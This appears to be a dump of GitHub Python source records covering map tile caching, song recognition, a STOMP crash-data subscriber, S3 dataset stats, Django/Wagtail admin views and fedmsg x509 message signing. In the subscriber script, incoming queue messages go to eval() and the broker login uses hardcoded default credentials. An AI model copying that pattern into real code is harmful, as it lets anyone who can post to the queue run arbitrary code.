complete.\")\n\n\nclass DownloaderThread(QThread):\n \n progress = pyqtSignal(int, int)\n error = pyqtSignal(unicode)\n \n def __init__(self, parent, tiletype, tilelist, overwrite):\n super(DownloaderThread, self).__init__(parent)\n self.tiletype = tiletype\n self.tilelist = tilelist\n self.overwrite = overwrite\n self.cancelled = False\n \n def isCancelled(self):\n return self.cancelled\n \n @pyqtSlot()\n def cancel(self):\n self.cancelled = True\n \n def run(self):\n log(\"ensuring %s tiles are downloaded\" % len(self.tilelist))\n cachedir = qosmsettings.get(qosmsettings.CACHE_DIRECTORY)\n tilefiles = [tm.filename(cachedir, self.tiletype, tile[0:2], tile[2]) for tile in self.tilelist]\n tileurls = [tm.tileurl(self.tiletype, tile[0:2], tile[2]) for tile in self.tilelist]\n \n if not self.overwrite:\n #remove existing files\n indicies = []\n for i in range(len(tilefiles)):\n if os.path.exists(tilefiles[i]):\n indicies.append(i)\n log(\"removing %s tiles that already exist\" % len(indicies))\n for i in reversed(indicies):\n tilefiles.pop(i)\n tileurls.pop(i)\n \n downloader.download(tileurls, tilefiles, self.overwrite, errorhandler=self.emiterror, progresshandler=self.emitprogress,\n cancelledcallback=self.isCancelled)\n \n def emitprogress(self, value, maximum):\n self.progress.emit(value, maximum)\n \n def emiterror(self, message):\n self.error.emit(message)\n\ndef tiles(extll, minzoom, maxzoom=None):\n if maxzoom is None:\n maxzoom = minzoom\n alltiles = []\n for zoom in range(minzoom, maxzoom+1):\n alltiles = alltiles + osm.tiles(extll.xMinimum(), extll.xMaximum(), \n extll.yMinimum(), extll.yMaximum(), zoom)\n return alltiles","repo_name":"paleolimbot/qosm","sub_path":"qosmpy/dialog_cachetiles.py","file_name":"dialog_cachetiles.py","file_ext":"py","file_size_in_byte":6853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"1707558170","text":"import pandas as pd\nfrom ShazamAPI import Shazam\nimport youtube_dl\nimport os\nfrom pydub import AudioSegment\nimport io\nfrom multiprocessing import Pool\n\ndef get_tracklist_of_url(url, output_path):\n '''\n main function\n '''\n title = url.split('/')[-2] + '_' + url.split('/')[-1]\n whole_audio_to_file(url, output_path) #download and save audio\n audio = AudioSegment.from_file(f'{output_path}complete/{title}.mp3', format='mp3') #load audio\n chunks = chunking(audio)\n tracks = get_tracks(chunks)\n df = tracks_to_df(tracks)\n return df\n \ndef tracks_to_df(tracks):\n df = pd.DataFrame(tracks)\n df = df.dropna()\n df = df.drop_duplicates()\n df['artist'] = df[0].apply(lambda x: x[0]).copy()\n df['track'] = df[0].apply(lambda x: x[1]).copy()\n df = df.drop(columns=[0])\n df = df.drop_duplicates().rename(columns = {0:'artist', 1:'track'})\n return df\n\ndef get_tracks(chunks):\n tracks = []\n with Pool() as pool:\n # call the same function with different data in parallel\n for result in pool.map(get_artist_title, chunks):\n # report the value to show progress\n tracks.append(result)\n return tracks\n \ndef chunking(audio):\n chunks = []\n chunk_length_ms = 30*1000 # 30-second chunks\n delay = 4 *60*1000 # every 2 minutes\n count = 40*1000 # starting at 40 seconds\n\n while True:\n start_time = count\n end_time = count + chunk_length_ms\n\n # Extract the desired chunk from the audio\n audio_chunk = audio[start_time:end_time]\n\n # Export the audio chunk as an MP3 file to a BytesIO object\n audio_file = io.BytesIO()\n audio_chunk.export(audio_file, format='mp3')\n\n # Read the audio data from the BytesIO object\n audio_data = audio_file.getvalue()\n\n # Add the audio data to the list\n chunks.append(audio_data)\n\n count = count + chunk_length_ms + delay\n if count + chunk_length_ms > len(audio):\n break \n return chunks\n \ndef whole_audio_to_file(url, output_path):\n title = url.split('/')[-2] + '_' + url.split('/')[-1]\n options = {\n 'format': 'best',\n 'outtmpl': f'{output_path}complete/{title}.mp3', # Output filename template\n }\n with youtube_dl.YoutubeDL(options) as ydl:\n ydl.download([url])\n print('downloaded')\n\ndef get_artist_title(file):\n '''\n returns artist,track\n '''\n shazam = Shazam(file)\n recognize_generator = shazam.recognizeSong()\n \n # Set the desired number of songs to recognize\n num_songs_to_recognize = 1\n songs_recognized = 0\n \n while songs_recognized < num_songs_to_recognize:\n try:\n song_info = next(recognize_generator)\n #print(song_info)\n songs_recognized += 1\n return song_info[1]['track']['subtitle'], song_info[1]['track']['title']\n except (StopIteration, KeyError):\n break","repo_name":"Buggy0815/djset-track-recognizer","sub_path":"scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27142433553","text":"\"\"\"\nCreated on Tue Feb 11 13:38:57 2020\n\n@author: Ronan Murphy 15397831; Conor Melody 15403058\nAssignment 1: Data Engineering for Distributed MicroService Pipeline \n\n\"\"\"\nimport stomp\nimport pandas as pd\nimport csv\nimport json\nfrom datetime import datetime\nimport time\n\n#set EXIT message to False, test to tell when to disconnect from Activemq\nEXIT = False\n#initalise host and port\nconn = stomp.Connection(host_and_ports=[('localhost', '61613')])\n\n#same publish method as in previous script sends message to assigned queue\ndef publish(conn, msg, destination):\n conn.send(body=msg, destination=destination)\n \ndef main():\n #this method reads in the sorted crash data for the month of January \n with open(\"Filtered_CrashData_v3.csv\", 'r') as readFile:\n csv_reader = csv.reader(readFile)\n next(csv_reader) #This removes the row containing the column titles\n JanuaryCrash_DateLoc_data = []\n #iterate through rows in CSV and convert time to Date-Time object\n for row in csv_reader:\n DateTime_Obj = datetime.strptime(row[1], '%Y-%m-%d %H:%M:%S')\n Crash_DateLoc = [DateTime_Obj.day, DateTime_Obj.hour , row[2]]\n JanuaryCrash_DateLoc_data.append(Crash_DateLoc)\n \n #add day, time and location to pandas dateframe\n Crashdf = pd.DataFrame(JanuaryCrash_DateLoc_data ,columns=['Crash_Day', 'Crash_Time', 'CrashLocation'])\n\n\n i = 1 #Initial day Value\n j = 0 #Initial hour Value\n\n #convert the values in the datafrane to a list \n crashes_list = Crashdf.values.tolist()\n #keep index to decide when to close last window\n currentindex = 0\n length = len(crashes_list) #Total number of crashes over 5 days\n everycrashincident = []\n #enter dictionary for boroughs assigning counts to zero\n crashes_dict = {'BROOKLYN' :0, 'QUEENS':0, 'STATEN ISLAND':0, 'MANHATTAN':0, 'BRONX':0}\n \n #iterate through crashes \n for crash in crashes_list:\n #if the crash is in current day and hour increment count for location\n if crash[0] == i and crash[1] == j:\n crashes_dict[crash[2]] = crashes_dict.get(crash[2], 0) + 1\n currentindex += 1\n\n #if next hour output this list and count of crashes in each Borough\n if crash[0] == i and crash[1] != j:\n \n currentindex+=1\n \n crashes_dictASLIST = list(crashes_dict.items())\n crashes_dictASLIST.extend([i,j])\n \n \n everycrashincident.append(crashes_dictASLIST)\n crashes_dict = {'BROOKLYN' :0, 'QUEENS':0, 'STATEN ISLAND':0, 'MANHATTAN':0, 'BRONX':0}\n crashes_dict[crash[2]] = crashes_dict.get(crash[2], 0) + 1\n \n j = crash[1] #Reset the hour to the current crash hour\n \n #if there is a new day output the daily window for the crashes \n if crash[0] != i:\n \n crashes_dictASLIST = list(crashes_dict.items())\n crashes_dictASLIST.extend([i,j]) #This is the last hour of each day\n everycrashincident.append(crashes_dictASLIST)\n \n \n \n i = crash[0]\n j = 0\n \n currentindex+=1\n \n #for the last window output daily and hourly windows\n if currentindex == length:\n \n crashes_dictASLIST = list(crashes_dict.items())\n crashes_dictASLIST.extend([i,j])\n everycrashincident.append(crashes_dictASLIST)\n #call global dataframe and add the data to each row, columns are Boroughs\n global df\n df = pd.DataFrame(everycrashincident, columns =[\"BROOKLYN\", \"QUEENS\", \"STATEN ISLAND\", \"MANHATTAN\", \"BRONX\", \"Day\", \"Hour\"])\n \n \n #assign listner if any messaage is received dequeue this message\n conn.set_listener('', MyListener())\n conn.connect(login='system', passcode='manager', wait=True)\n #subscribes to previous queue\n conn.subscribe(destination='/queue/test4', id=4, ack='auto')\n \n #wait if incase a message is slow to send \n while not EXIT:\n time.sleep(60)\n \n #disconnect from queue\n conn.disconnect()\n\n \nclass MyListener(stomp.ConnectionListener):\n def _init_(self,conn, df):\n self.df = df\n \n def on_error(self, headers, message):\n print('received an error \"%s\"' % message)\n\n def on_message(self, headers, message):\n \n mess = eval(message)\n print(mess)\n if mess[0]== \"Daily Window\":\n day = mess[1] #Selecting day element from tumbling window output\n hour = mess[2] #Selecting hour element from tumbling window output\n \n #get crashes in peak hour \n \n \n row_index = ((df[(df['Day'] == day) & (df['Hour'] == hour)].index))[0] #Need [0] here to access necessary element of object\n #print(\"row_index\", row_index)\n df1 = df.loc[[row_index]] #This row is now a sub -DataFrame\n list3 = df1.values.tolist() # Converting row values to a list within a list\n\n \n l3 = []\n for element in list3: #This for loop extracts the one list from within the larger list\n for x in element:\n l3.append(x)\n\n\n del l3[-1] # Removes the Hour\n del l3[-1] #Removes the day\n crashes_forthishour = []\n for element in l3:\n crashes_forthishour.append(element[1])\n \n total_crashesinhour = sum(crashes_forthishour) #Total sum of crashes for this hour\n mess.extend([total_crashesinhour])\n else:\n day = mess[0] #Selecting day element from tumbling window output\n hour = mess[1] #Selecting hour element from tumbling window output\n loc = mess[3] #Selecting location element from tumbling window output\n \n \n row_index = (df[(df['Day'] == day) & (df['Hour'] == hour)].index)[0] #Need [0] here to access necessary element of object\n column_index = df.columns.get_loc(loc)\n numberofcrashes = (df.iloc[row_index, column_index][1])\n s = \"Number of crashes in this hour at this location = {}\".format(numberofcrashes)\n mess.extend([s])\n jsonData = json.dumps(mess, default = str)\n publish(conn, jsonData, '/queue/test5')\n \n \n if 'exit' in message:\n \n global EXIT\n EXIT = True\n\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"ronanmmurphy/NYC-Real-Time-Taxi-Feedback","sub_path":"src/Scripts/subscriber4.py","file_name":"subscriber4.py","file_ext":"py","file_size_in_byte":6684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21587742237","text":"import streamlit as st\n\nfrom collections import defaultdict\nimport boto3\n\nimport pandas as pd\n\nfrom dotenv import find_dotenv, load_dotenv\nimport os\n\nload_dotenv(find_dotenv())\n\nAWS_ACCESS_KEY = os.getenv(\"AWS_ACCESS_KEY\")\nAWS_SECRET_ACCESS_KEY = os.getenv(\"AWS_SECRET_ACCESS_KEY\")\n\nclient = boto3.client('s3', region_name='eu-west-3', aws_access_key_id=AWS_ACCESS_KEY, aws_secret_access_key=AWS_SECRET_ACCESS_KEY, config=boto3.session.Config(signature_version='s3v4'))\ns3 = boto3.resource('s3', aws_access_key_id=AWS_ACCESS_KEY, aws_secret_access_key=AWS_SECRET_ACCESS_KEY,)\nbucket = s3.Bucket(\"soundx-audio-dataset\")\n\n@st.cache_data(ttl=600)\ndef load_data():\n files = defaultdict(list)\n for obj in bucket.objects.all():\n if obj.key.endswith('.wav'):\n label, file = obj.key.split('/')[0], obj.key.split('/')[1]\n files[label].append(file)\n return files\n\n\nfiles = load_data()\n\nsummary = pd.DataFrame()\nfor label in files.keys():\n if label.startswith('AAAAA'):\n continue\n num_files = len(files[label])\n clean_files = len([file for file in files[label] if file.startswith('CLEAN')])\n df = pd.DataFrame({'label': label, 'num_files': num_files, 'clean_files': clean_files, 'raw_files': num_files - clean_files}, index=[0])\n # st.write(df)\n summary = pd.concat([summary, df], axis=0)\n\nsummary = summary.sort_values(by=['num_files'])\nst.dataframe(summary)","repo_name":"julienroulle/soundx","sub_path":"pages/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"16194028647","text":"from time import sleep\nfrom machine import Pin\n\npinMap = (16, 5, 4, 0, 2, 14, 12, 13, 15, 3)\noutputs = [Pin(gpio, Pin.OUT) for gpio in pinMap[:8]]\n\nbackground = outputs[1:3]\nletters = outputs[3:5]\n\ndef show_code(name='main.py'):\n\twith open(name) as f:\n\t\tfor line in f.readlines():\n\t\t\tprint(line, end='')\n\ndef allOff():\n\tfor output in outputs:\n\t\toutput.low()\n\t\t\ndef allOn():\n\tfor output in outputs:\n\t\toutput.high()\n\ndef flashOne(index, delay=1):\n\toutputs[index].high()\n\tsleep(delay)\n\toutputs[index].low()\n\tsleep(delay)\n\ndef flashAll(delay=1):\n\tallOn()\n\tsleep(delay)\n\tallOff()\t\t\n\tsleep(delay)\n\ndef run():\n\tfor light in background:\n\t\tlight.high()\n\twhile True:\n\t\tfor light in letters:\n\t\t\tlight.low()\n\t\tsleep(1)\n\t\tletters[0].high()\n\t\tsleep(0.5)\n\t\tletters[1].high()\n\t\tsleep(0.5)\n\t\t\nrun()\n","repo_name":"ShrimpingIt/tableaux","sub_path":"regimes/02_bazinga/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33875866634","text":"from ast import While\nimport threading\nfrom urllib import response\nimport time\nimport grpc\nimport dica_pb2_grpc\nimport dica_pb2\n\nimport redis\n\nempty = dica_pb2.google_dot_protobuf_dot_empty__pb2.Empty()\n\n\nclass Client:\n def __init__(self, nome: str):\n self.nome = nome\n self.espera_jogador = ''\n channel = grpc.insecure_channel('localhost:50051')\n self.stub = dica_pb2_grpc.DicaServiceStub(channel)\n self.__entrar_jogo()\n self.__escutar_jogo()\n time.sleep(5)\n while True:\n self.__escutar_rodada()\n\n response = self.stub.ConfereFim(empty)\n # só finaliza ou continua depois de todos terem recebido o palpite\n if response.fim:\n print('Resposta correta!')\n break\n print('Não foi dessa vez...')\n time.sleep(2)\n self.__fim_jogo(response.ganhador1, response.ganhador2)\n\n def __escutar_jogo(self):\n palavra = ''\n print('Esperando Jogadores')\n response = self.stub.PartidaStream(empty)\n\n duplas = self.stub.MostrarJogadores(empty)\n print(f'As duplas são: ')\n print(f'Dupla 1: {duplas.jogador1} e {duplas.jogador3}')\n print(f'Dupla 2: {duplas.jogador2} e {duplas.jogador4}')\n\n if(response.nome == self.nome):\n palavra = str(\n input('É a sua vez de escolher a palavra!\\nPalavra: '))\n response_palavra = self.stub.EscolherPalavra(\n dica_pb2.Palavra(palavra=palavra))\n print(\n f'A palavra que você escolheu foi: {response_palavra.palavra}')\n else:\n print(f'{response.nome} está digitando a palavra!')\n self.__espera()\n\n def __escutar_rodada(self):\n\n response = self.stub.ConfereVez(empty)\n self.espera_jogador = response.nome\n\n print(f'{response.nome} quem dará a dica!')\n\n response_dica = dica_pb2.Dica(dica='')\n response_palpite = dica_pb2.PalpiteResposta(\n palpite='', acertou=False, recebeu=False)\n response_enviar_dica = dica_pb2.NomeJogadorResp(\n nome='', recebida=False)\n\n # TODO um loop para esperar nos outros clientes enquanto quem dá a dica n fornece\n if response.nome == self.nome:\n response_palavra = self.stub.VerPalavra(empty)\n print(f\"A palavra é: {response_palavra.palavra}\")\n dica = str(input('Forneça sua dica: '))\n response_enviar_dica = self.stub.DarDica(dica_pb2.Dica(dica=dica))\n self.espera_jogador = response_enviar_dica\n\n response_espera = self.stub.AlteraEspera(\n dica_pb2.Espera(espera=False))\n else:\n # TODO colocar um try except no loop enquanto a dica não é fornecida\n time.sleep(1)\n print(f'{response.nome} está digitando a dica!')\n self.__espera()\n\n response_dica = self.stub.VerDica(empty)\n self.stub.MensagemRecebida(empty)\n print(f\"{response.nome} deu a dica: {response_dica.dica}\")\n\n time.sleep(5)\n print(f'Quem dará o palpite é: {self.espera_jogador}!')\n\n if self.espera_jogador == self.nome:\n palpite = input(f'{self.nome}, digite seu palpite: ')\n self.stub.DarPalpite(\n dica_pb2.Palpite(palpite=palpite, jogador=self.nome))\n response_espera = self.stub.AlteraEspera(\n dica_pb2.Espera(espera=False))\n else:\n print(f'{self.espera_jogador} está digitando o palpite!')\n time.sleep(10)\n\n self.__espera()\n\n time.sleep(10)\n response_palpite = self.stub.VerPalpite(empty)\n self.stub.MensagemRecebida(empty)\n\n print(f'O palpite enviado foi {response_palpite.palpite}')\n\n def __entrar_jogo(self):\n response = self.stub.CriarJogador(\n dica_pb2.NomeJogador(nome=self.nome))\n # print(f'resp: {response}')\n\n def __espera(self):\n while True:\n\n response = self.stub.ConfereEspera(empty)\n\n self.espera_jogador = response.jogador\n\n if response.espera == False:\n break\n time.sleep(3)\n\n def __fim_jogo(self, ganhadorA, ganhadorB):\n r = redis.Redis(host='localhost', port=6379)\n r.set('ganhadores', ganhadorA + ' ' + 'e' + ' ' + ganhadorB)\n ganhadores = r.get('ganhadores')\n print((f'Parabéns! {ganhadores} ganharam o jogo!!!'))\n\n\nif __name__ == '__main__':\n nome_jogador = input('Digite seu nome: ')\n c = Client(nome_jogador)\n","repo_name":"fernandanlisboa/grpc-jogo-dica","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"17039377282","text":"import logging\n\nfrom keras import Model\nfrom keras.layers import Dense\n\nfrom keras_pandas.Automater import Automater\nfrom keras_pandas.lib import load_titanic\n\n\ndef main():\n logging.getLogger().setLevel(logging.DEBUG)\n\n observations = load_titanic()\n\n # Transform the data set, using keras_pandas\n categorical_vars = ['pclass', 'sex', 'survived']\n numerical_vars = ['age', 'siblings_spouses_aboard', 'parents_children_aboard', 'fare']\n text_vars = ['name']\n\n auto = Automater(categorical_vars=categorical_vars, numerical_vars=numerical_vars, text_vars=text_vars,\n response_var='survived')\n X, y = auto.fit_transform(observations)\n\n # Start model with provided input nub\n x = auto.input_nub\n\n # Fill in your own hidden layers\n x = Dense(32)(x)\n x = Dense(32, activation='relu')(x)\n x = Dense(32)(x)\n\n # End model with provided output nub\n x = auto.output_nub(x)\n\n model = Model(inputs=auto.input_layers, outputs=x)\n model.compile(optimizer='Adam', loss=auto.loss, metrics=['accuracy'])\n\n # Train model\n model.fit(X, y, epochs=4, validation_split=.2)\n\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"NLPatVCU/Sentiment-Classification","sub_path":"keras_test/keras_test/lib/python3.6/site-packages/examples/titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"27029762835","text":"from django.shortcuts import get_object_or_404, redirect\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom wagtail.wagtailadmin import messages\nfrom wagtailmodeladmin.views import (\n CreateView, ObjectSpecificView, WMAFormView, ConfirmDeleteView,\n permission_denied_response)\nfrom treebeard.forms import movenodeform_factory\nfrom .forms import MoveForm, NoIndentationMoveForm\n\n\nclass TreebeardCreateView(CreateView):\n \"\"\"\n A customised CreateView class to help create Treabeard nodes at specific\n positions in a tree\n \"\"\"\n\n def dispatch(self, request, *args, **kwargs):\n \"\"\"\n When the view is loaded for a request, look for 'parent_id',\n 'sibling_id' and 'pos' values in POST or GET, and use them to assign\n values to the class instance for later use. Check out the\n `TreebeardButtonHelper` class to see where those additional values\n come from.\n \"\"\"\n r = request\n qs = self.model._default_manager.get_queryset()\n self.parent_obj = None\n self.sibling_obj = None\n self.tree_add_position = None\n self.parent_id = r.POST.get('parent_id') or r.GET.get('parent_id')\n self.sibling_id = r.POST.get('sibling_id') or r.GET.get('sibling_id')\n if self.parent_id is not None:\n self.parent_obj = get_object_or_404(qs, id=int(self.parent_id))\n elif self.sibling_id is not None:\n self.sibling_obj = get_object_or_404(qs, id=int(self.sibling_id))\n self.tree_add_position = r.POST.get('pos') or r.GET.get('pos')\n return super(TreebeardCreateView, self).dispatch(r, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n \"\"\"\n Add some additional variables to the context, so they can be used\n in the template to add some hidden field values to the form\n \"\"\"\n context = super(TreebeardCreateView, self).get_context_data(**kwargs)\n context.update({\n 'parent_obj': self.parent_obj,\n 'sibling_obj': self.sibling_obj,\n 'tree_add_position': self.tree_add_position,\n })\n return context\n\n def form_valid(self, form):\n \"\"\"\n Override what happens when the form is saved. Instead of straight-up\n saving a new object, we need to use treebeard's `add_child` or\n `add_sibling` methods to add node into the correct place.\n \"\"\"\n instance = form.save(commit=False)\n\n if self.parent_obj:\n self.parent_obj.add_child(instance=instance)\n elif self.sibling_obj:\n self.sibling_obj.add_sibling(instance=instance,\n pos=self.tree_add_position)\n else:\n self.model.add_root(instance=instance)\n\n messages.success(\n self.request, self.get_success_message(instance),\n buttons=self.get_success_message_buttons(instance)\n )\n return redirect(self.get_success_url())\n\n\nclass TreebeardMoveView(ObjectSpecificView, WMAFormView):\n page_title = _('Moving')\n\n def check_action_permitted(self):\n user = self.request.user\n return self.permission_helper.can_edit_object(user, self.instance)\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n if not self.check_action_permitted():\n return permission_denied_response(request)\n return super(TreebeardMoveView, self).dispatch(request, *args,\n **kwargs)\n\n def get_meta_title(self):\n return _('Moving %s') % self.model_name.lower()\n\n def get_page_subtitle(self):\n return self.instance\n\n def get_form_class(self):\n if self.model_admin.move_form_select_indentation:\n formclass = MoveForm\n else:\n formclass = NoIndentationMoveForm\n return movenodeform_factory(self.model, form=formclass, fields=[])\n\n def get_form_kwargs(self):\n \"\"\"\n Returns the keyword arguments for instantiating the form.\n \"\"\"\n kwargs = super(TreebeardMoveView, self).get_form_kwargs()\n if hasattr(self, 'object'):\n kwargs.update({'instance': self.get_instance()})\n return kwargs\n\n def get_context_data(self, **kwargs):\n return {'view': self, 'form': self.get_form()}\n\n def get_template_names(self):\n return self.model_admin.get_templates('move')\n\n\nclass TreebeardConfirmDeleteView(ConfirmDeleteView):\n\n def delete_instance(self):\n self.model.objects.get(id=self.instance.id).delete()\n","repo_name":"Luperi/wagtailmodeladmin","sub_path":"wagtailmodeladmin/recipes/treebeard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"99"} +{"seq_id":"8433402834","text":"import logging\nimport os\nimport tempfile\nimport warnings\n\nfrom requests.exceptions import RequestException\nimport six\ntry:\n # Else we need M2Crypto and m2ext\n import M2Crypto\n import m2ext\n _m2crypto = True\nexcept ImportError:\n _m2crypto = False\n\nfrom . import utils\nfrom .x509_ng import _cryptography, sign as _crypto_sign, validate as _crypto_validate\nimport fedmsg.crypto # noqa: E402\nimport fedmsg.encoding # noqa: E402\n\n\n_log = logging.getLogger(__name__)\n\nif six.PY3:\n long = int\n\n\ndef _disabled_sign(*args, **kwargs):\n \"\"\"A fallback function that emits a warning when no crypto is being used.\"\"\"\n warnings.warn('Message signing is disabled because \"cryptography\" and '\n '\"pyopenssl\" or \"m2crypto\" are not available.')\n\n\ndef _disabled_validate(*args, **kwargs):\n \"\"\"A fallback function that emits a warning when no crypto is being used.\"\"\"\n warnings.warn('Message signature validation is disabled because (\"cryptography\"'\n ' and \"pyopenssl\") or \"m2crypto\" are not available.')\n\n\ndef _m2crypto_sign(message, ssldir=None, certname=None, **config):\n \"\"\" Insert two new fields into the message dict and return it.\n\n Those fields are:\n\n - 'signature' - the computed RSA message digest of the JSON repr.\n - 'certificate' - the base64 X509 certificate of the sending host.\n \"\"\"\n if ssldir is None or certname is None:\n error = \"You must set the ssldir and certname keyword arguments.\"\n raise ValueError(error)\n\n message['crypto'] = 'x509'\n\n certificate = M2Crypto.X509.load_cert(\n \"%s/%s.crt\" % (ssldir, certname)).as_pem()\n # Opening this file requires elevated privileges in stg/prod.\n rsa_private = M2Crypto.RSA.load_key(\n \"%s/%s.key\" % (ssldir, certname))\n\n digest = M2Crypto.EVP.MessageDigest('sha1')\n digest.update(fedmsg.encoding.dumps(message))\n\n signature = rsa_private.sign(digest.digest())\n\n # Return a new dict containing the pairs in the original message as well\n # as the new authn fields.\n return dict(message.items() + [\n ('signature', signature.encode('base64').decode('ascii')),\n ('certificate', certificate.encode('base64').decode('ascii')),\n ])\n\n\ndef _m2crypto_validate(message, ssldir=None, **config):\n \"\"\" Return true or false if the message is signed appropriately.\n\n Four things must be true:\n\n 1) The X509 cert must be signed by our CA\n 2) The cert must not be in our CRL.\n 3) We must be able to verify the signature using the RSA public key\n contained in the X509 cert.\n 4) The topic of the message and the CN on the cert must appear in the\n :ref:`conf-routing-policy` dict.\n\n \"\"\"\n\n if ssldir is None:\n raise ValueError(\"You must set the ssldir keyword argument.\")\n\n def fail(reason):\n _log.warn(\"Failed validation. %s\" % reason)\n return False\n\n # Some sanity checking\n for field in ['signature', 'certificate']:\n if field not in message:\n return fail(\"No %r field found.\" % field)\n if not isinstance(message[field], six.text_type):\n _log.error('msg[%r] is not a unicode string' % field)\n try:\n # Make an effort to decode it, it's very likely utf-8 since that's what\n # is hardcoded throughout fedmsg. Worst case scenario is it'll cause a\n # validation error when there shouldn't be one.\n message[field] = message[field].decode('utf-8')\n except UnicodeError as e:\n _log.error(\"Unable to decode the message '%s' field: %s\", field, str(e))\n return False\n\n # Peal off the auth datums\n signature = message['signature'].decode('base64')\n certificate = message['certificate'].decode('base64')\n message = fedmsg.crypto.strip_credentials(message)\n\n # Build an X509 object\n cert = M2Crypto.X509.load_cert_string(certificate)\n\n # Validate the cert. Make sure it is signed by our CA.\n # validate_certificate will one day be a part of M2Crypto.SSL.Context\n # https://bugzilla.osafoundation.org/show_bug.cgi?id=11690\n\n ca_location = config.get('ca_cert_location', 'https://fedoraproject.org/fedmsg/ca.crt')\n crl_location = config.get('crl_location', 'https://fedoraproject.org/fedmsg/crl.pem')\n fd, cafile = tempfile.mkstemp()\n try:\n ca_certificate, crl = utils.load_certificates(ca_location, crl_location)\n os.write(fd, ca_certificate.encode('ascii'))\n os.fsync(fd)\n ctx = m2ext.SSL.Context()\n ctx.load_verify_locations(cafile=cafile)\n if not ctx.validate_certificate(cert):\n ca_certificate, crl = utils.load_certificates(\n ca_location, crl_location, invalidate_cache=True)\n with open(cafile, 'w') as f:\n f.write(ca_certificate)\n ctx = m2ext.SSL.Context()\n ctx.load_verify_locations(cafile=cafile)\n if not ctx.validate_certificate(cert):\n return fail(\"X509 certificate is not valid.\")\n except (IOError, RequestException) as e:\n _log.error(str(e))\n return False\n finally:\n os.close(fd)\n os.remove(cafile)\n\n if crl:\n try:\n fd, crlfile = tempfile.mkstemp(text=True)\n os.write(fd, crl.encode('ascii'))\n os.fsync(fd)\n crl = M2Crypto.X509.load_crl(crlfile)\n finally:\n os.close(fd)\n os.remove(crlfile)\n # FIXME -- We need to check that the CRL is signed by our own CA.\n # See https://bugzilla.osafoundation.org/show_bug.cgi?id=12954#c2\n # if not ctx.validate_certificate(crl):\n # return fail(\"X509 CRL is not valid.\")\n\n # FIXME -- we check the CRL, but by doing string comparison ourselves.\n # This is not what we want to be doing.\n # There is a patch into M2Crypto to handle this for us. We should use it\n # once its integrated upstream.\n # See https://bugzilla.osafoundation.org/show_bug.cgi?id=12954#c2\n revoked_serials = [long(line.split(': ')[1].strip(), base=16)\n for line in crl.as_text().split('\\n')\n if 'Serial Number:' in line]\n if cert.get_serial_number() in revoked_serials:\n subject = cert.get_subject()\n\n signer = '(no CN)'\n if subject.nid.get('CN'):\n entry = subject.get_entries_by_nid(subject.nid['CN'])[0]\n if entry:\n signer = entry.get_data().as_text()\n\n return fail(\"X509 cert %r, %r is in the Revocation List (CRL)\" % (\n signer, cert.get_serial_number()))\n\n # If the cert is good, then test to see if the signature in the messages\n # matches up with the provided cert.\n rsa_public = cert.get_pubkey().get_rsa()\n digest = M2Crypto.EVP.MessageDigest('sha1')\n digest.update(fedmsg.encoding.dumps(message))\n try:\n if not rsa_public.verify(digest.digest(), signature):\n raise M2Crypto.RSA.RSAError(\"RSA signature failed to validate.\")\n except M2Crypto.RSA.RSAError as e:\n return fail(str(e))\n\n # Now we know that the cert is valid. The message is *authenticated*.\n # * Next step: Authorization *\n\n # Load our policy from the config dict.\n routing_policy = config.get('routing_policy', {})\n\n # Determine the name of the signer of the message.\n # This will be something like \"shell-pkgs01.stg.phx2.fedoraproject.org\"\n subject = cert.get_subject()\n signer = subject.get_entries_by_nid(subject.nid['CN'])[0]\\\n .get_data().as_text()\n\n return utils.validate_policy(\n message.get('topic'), signer, routing_policy, config.get('routing_nitpicky', False))\n\n\n# Maintain the ``sign`` and ``validate`` APIs while preferring cryptography and\n# pyOpenSSL over M2Crypto.\nif _cryptography:\n sign = _crypto_sign\n validate = _crypto_validate\nelif _m2crypto:\n sign = _m2crypto_sign\n validate = _m2crypto_validate\nelse:\n sign = _disabled_sign\n validate = _disabled_validate\n","repo_name":"fedora-infra/fedmsg","sub_path":"fedmsg/crypto/x509.py","file_name":"x509.py","file_ext":"py","file_size_in_byte":8119,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"99"} +{"seq_id":"20722116339","text":"from pathlib import Path\n\nimport torch\nfrom torch import nn\nfrom common.const.model import MDL_Q_ENC\n\nclass CheckpointingModule(nn.Module):\n def __init__(self, **config):\n super().__init__()\n self.config = config\n\n @classmethod\n def checkpoint_path(cls, directory: str):\n return Path(directory, '%s.pt' % cls.__name__)\n\n @classmethod\n def create_or_load(cls, path: str = None, **config):\n state = None\n\n if path is not None and cls.checkpoint_path(path).exists():\n print(\"Loading from pretrained.\")\n with cls.checkpoint_path(path).open('rb') as fp:\n load_preset = torch.load(fp)\n\n new_config = {}\n new_config[MDL_Q_ENC] = config[MDL_Q_ENC]\n new_config.update(load_preset['config'])\n state = load_preset['state']\n\n model = cls(**new_config)\n else:\n model = cls(**config)\n \n if state is not None:\n print(\"State is not None\")\n new_state = state.copy()\n for key in state.keys():\n if 'equation' in key:\n new_state.pop(key)\n new_state[key.replace('equation.','')] = 